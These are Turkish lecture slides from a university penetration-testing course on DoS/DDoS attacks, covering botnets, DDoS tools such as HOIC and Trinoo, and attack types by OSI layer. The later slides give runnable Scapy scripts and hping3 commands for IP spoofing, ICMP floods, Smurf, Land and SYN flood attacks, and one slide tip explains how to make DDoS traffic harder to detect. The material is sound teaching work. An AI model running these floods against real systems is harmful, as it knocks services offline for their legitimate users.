dağıtık servis dışı bırakma saldırıları

Temel Bilgiler BotNetsDDoS Saldırıları

Servis Dısı Bırakma TestleriBGM 554 - Sızma Testleri ve Guvenlik Denetlemeleri-II

Bilgi Guvenligi MuhendisligiYuksek Lisans Programı

Dr. Ferhat Ozgur [email protected]

Istanbul Sehir Universitesi2016 - Bahar

Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri


Icindekiler

1 Temel BilgilerTCP/IP StandardıDos/DDoS SaldırılarıDigital Attack Map

2 BotNetsBotnetRoBotNetwork

Botnet PropagationBotnet AraclarıDos/DDoS Aracları

3 DDoS SaldırılarıGirisYontemlerSaldırılar



TCP/IP StandardıDos/DDoS Saldırıları

Digital Attack Map

Icindekiler








Digital Attack Map

TCP/IP Standardı

Tanım

I Internet’in temeli

I Yollanan veriler her katmandasarmallanır (encapsulation) ve biralt katmana yollanır.

I Alıcı tarafında bu veriler teker tekeracılıp (decapsulation) bir ustkatmana gonderilir

I Uygulama

I Tasıma

I Ag

I AgErisimi




Digital Attack Map

Dos/DDoS Saldırıları

Kavramlar

I DoS

I DDoS

I RoBotNetwork




Digital Attack Map

DoS Saldırıları

Hedef

I Sunucu/Bilgisayar

I Ag bilesenleri

I Uygulamalar

I Web siteleri

Yaklasım

I Band genisligiI kurallara uygun olmayan, yuksek trafik istegiI hedef: ag band genisligi, baglantı

I BaglantıI Sunucu yuksek baglantı istegi ile calısamaz hale getirilir.I CPU/Memory kaynakları tukenirI Yasal kullanıcılar icin cevap veremez hale gelir.

I Sonuc: Isletmenin hizmet verememesi.




Digital Attack Map

DDoS Saldırıları

DDoS

I Kurbana yapılan saldırının tek kaynaktan yapılmaması.

I Koordineli sekilde yuksek boyutlu saldırı

I Cesitli ajan yazılımlar kullanılarak yapılmaktadır.




Digital Attack Map

DoS Saldırı Etkileri

DoS Saldırı Etkileri

I IT birimine olan etkileriI dusuk ag genisligiI Istek icin baglantıda yavaslıkI Isteklere cevap verememe

I Isletmeye etkileriI Prestij kaybıI Musteri kaybıI Calısmayan servisler




Digital Attack Map

Digital Attack Map - http://www.digitalattackmap.com I




Digital Attack Map

Digital Attack Map - http://www.digitalattackmap.com II




Digital Attack Map

Digital Attack Map - http://www.digitalattackmap.com III

Digital Attack Map

I Canlı DDoS saldırıları

I Gecmis tarih gosterimi

I Basında yer alan haberlerI Google Jigsaw (Eski adı: Google Ideas)

I Project Shield (anti-DDoS Service)I media, elections, and human rights related content.I Cloudflare alternatif



BotnetRoBotNetworkBotnet Propagation

Botnet AraclarıDos/DDoS Aracları

Icindekiler









Botnet

Botnet

I Bot: Saldırgan tarafından zararlı amaclar icin bilgisayarlarınkontrolunu alan yazılımlar.

I Zombie, zombie agentI Cluster: Ele gecirilmis (compromised computers)

bilgisyarlardan olusan, bir kurbana saldıran bilgisayar kumesiI Bu bilgisayarlar sahiplerinin haberi olmadan ele gecirilmislerdir.I Baska birinin bilgisayarını kullnarak saldırgan yasal olmayan

aktivitelerini gizler.





RoBotNetwork I

Tanım

Cesitli gorevleri yerinegetirmek icin ”botnetowner” tarafındankullanılan ineternete baglıolan cihazlardan olusan ag.

I DDoS

I Veri Hırsızlıgı

I Spam

I Bir cihaza erisim





RoBotNetwork II

Mimari

Sekil: Client-Server Model

I Rustock botnet

I Srizbi botnet

Sekil: P2P Model

I Gameover ZeuS

I ZeroAccess botnet





RoBotNetwork III

Botnet Bilesenleri

I Command and control (C&C):I Botnet uyelerine komutları gonderen bilgisayarlar.

I Zombie computer :I Zararlı gorevleri yerine getirmek icin saldırgan, virus gibi

bilesenler tarafından ele gecirilen bilgisayarlar.





RoBotNetwork IV

Carna Botnet

I ”Default password”, ”no password” router kullanıldı.

I 24 saatlik internet kullanımını gostermek icin





Botnet Propagation

I Yayılım dolaylı olur.

I Saldırgan yonetici olarakcalısır, saldırıya katılmaz

I Saldırgan “campaignmanagers” uzerinden gider

I Saldırgan, saldırı agıolusturur ”affiliationnetwork of attackers”





Botnet Aracları

Botnet Aracları

I Win32.Shark: backdoor Trojan horseOzellikleri

I reverse connecting

I firewall-bypassing

I remote admnistration

Yayılma Yontemleri

I Spam e-postalar

I illegal siteler

I Poison Ivy: Remote Access Trojan (RAT)

I sifreler

I banka bilgileri

I Netbot Attacker

I PlugBot





Dos/DDoS Aracları I

I Tribal Flood Network (TFN):I Unix-based, ICMP, Smurf, UDP, SYN flood saldırıları

I Trinoo:I UDP flood

I Stacheldraht:I UDP, ICMP, TCP SYN, Smurf attack

I TFN2K:

I WinTrinoo:

I ShaftI MStream

I Agent binaries contain a list of master machines that aredefined at compile-time by the attacker.

I Trinity





Dos/DDoS Aracları II

Table: DDoS Aracları

DDoS Tool Saldırı Yontemi

Trinoo UDPTFN UDP, ICMP, TCPStacheldraht UDP, ICMP, TCPTFN2K UDP, ICMP, TCPShaft UDP, ICMP, TCPMStream TCPTrinity UDP, TCP

Ipucu

Kullanılan DDoS aracının olusturdugu trafigin yakalanmasınızorlastırmak icin yuksek port numaraları kullanmalı, iletisim sifreliolmalıdır.





Dos/DDoS Aracları III

DDoS Tools

I Low Orbit Ion Cannon (LOIC)

I High Orbit Ion Cannon (HOIC)

I Anonymous DoS

I Tor’s Hammer

I DDOSIM

I DAVOSET

I PyLoris

I Moihack Port-Flooder

I XOIC

I OWASP DOS HTTP Post





High Orbit Ion Cannon (HOIC) I

High Orbit Ion Cannon (HOIC)

I HTTP focused distruction tool.

I Yuksek hızlı multi-threaded HTTP seli

I Es zamanlı farklı sitelere HTTP seli

I Farklı HTTP baslıkları olusturarak ”traffic flow” senaryosucalıstırabilme

I Windows icin gelistirilmis

I Wine ile Linux, Mac Osx ile kullanılabilir.





High Orbit Ion Cannon (HOIC) II





High Orbit Ion Cannon (HOIC) III





High Orbit Ion Cannon (HOIC) IV

Paketler

I ”Follow stream”



Giris YontemlerSaldırılar

Icindekiler








DDoS Saldırıları

OSI katmanları ve DDoS

I L7:I Uygulamalarda bulunan

Bellek, Disk, CPU odaklıbuglar

I Brute forceI DNS AmplificationI Fork Bomb

I L4:I SYN FloodI TeardropI ACK/FIN/RST floodI DRDOS (Reflection)

I L3:I ICMP/Ping floodI FraggleI SmurfI Ping of Death

I L2:I ARP seliI VTP saldırısı

I L1:I Fiziksel zararI Ag/Guc kablosunun

cekilmesi




Yontemler

Yontemler

I Miktar Artırma

I Boyut artırma

I Yansıtma




Paket




IP Sahteciligi I

IP Sahteciligi (IP Spoofing)

I istenilen sahte ip adresinden TCP/IP paketleri gonderilmesi

I TCP, UDP, IP, ICMP, HTTP, SMTP, DNS




IP Sahteciligi II




IP Sahteciligi Scapy

from scapy.all import *

A = ’192.168.0.101 ’ # spoofed source IP address

B = ’192.168.0.102 ’ # destination IP address

C = 10000 # source port

D = 20000 # destination port

payload = "yada yada yada" # packet payload

spoofed_packet=IP(src=A,dst=B)/TCP(sport=C,dport=D)/ payload

send(spoofed_packet)




ICMP Attacks I

ICMP Attacks

I Ping sweep:I Ag uzerinde bulunan bilgisayarların kesfi icin kullanılan en eski

yontemlerden biri.

Listing 1: fping kullanımı

$ fping -g 192.168.2.1/24

192.168.2.1 is alive

192.168.2.2 is alive

192.168.2.6 is alive




ICMP Attacks II

Listing 2: nmap kullanımı$ nmap -sP 192.168.2.1/24 -open

Starting Nmap 7.12 ( https :// nmap.org ) at 2017 -02 -18 21:53 MSK

Nmap scan report for 192.168.2.1

Host is up (0.0076s latency ).







Nmap done: 256 IP addresses (4 hosts up) scanned in 3.81 seconds




ICMP Attacks III

Listing 3: Bash for loop script versiyonu$ for i in {1..254}; do ping -c 1 192.168.2. $i |grep ’from ’;done

64 bytes from 192.168.2.1: icmp_seq =0 ttl=64 time =4.122 ms






Ping Flood (ICMP Flood) I

ICMP Seli

I Saldırgan, kurban bilgisayara cok yuksek miktarda ICMP(ping) istekleri gondererek kaynak tuketimine yol acmasınısaglar

I Saldırı 3 kategoriye ayrılabilir.I Hedefli ping seli: Lokal ag icerisinde yer alan bilgisayar.

Saldırgan fiziksel erisimi mevcutI Router hedefli ping seli: Hedef routerlar, amac ag icerisinde

yer alan bilgisayar haberlesmesinin engellenmesi.I Blind Ping Flood:




Ping Flood (ICMP Flood) II

Listing 4: Python ICMP seli


ip_hdr = IP(dst="192.168.2.1")

packet = ip_hdr/ICMP ()/("m"*60000) #send 60kb of junk

send(packet)




Ping Flood (ICMP Flood) III

Listing 5: Hping3 ICMP seli

hping3 -1 --flood 192.168.2.7




ICMP Smurf I




ICMP Smurf II

Listing 6: Python ICMP Smurf


victim_ip = "192.168.2.7"

ip_hdr = IP(src=victim_ip , dst="192.168.2.6")

packet = ip_hdr/ICMP ()/("m"*60000) #send 60kb of junk

send(packet)




ICMP Smurf III

Listing 7: Hping3 ICMP Smurf

hping3 -1 --flood -a 192.168.2.3 192.168.2.7




Land Attack I

Land Saldırısı

I Saldırgan spoof edilmis SYN paketleri gonderir

I Paketlerde source ve destination IP adresleri kurbanın IPadresidir.

I Kurban cevap olarak kendisine SYN-ACK paketi gonderir.

I Bu sekilde sistem kaynaklarının tuketilmesi hedeflenir




Land Attack II




Land Attack III

Listing 8: Land Attackhping3 -c 1 --baseport 80 --destport 80 -S --spoof X.X.X.X X.X.X.X




Land Attack IV

Listing 9: Python Land Attack>>> send(IP(src="192.168.2.7", dst="192.168.2.7")/TCP(sport =135, dport =135), count =2000)

................................................

Sent 2000 packets.




TCP SYN Seli I




TCP SYN Seli II

Listing 10: Hping SYN Seli

$ sudo hping3 --flood -S -p 88 192.168.2.7


dağıtık servis dışı bırakma saldırıları

Engineering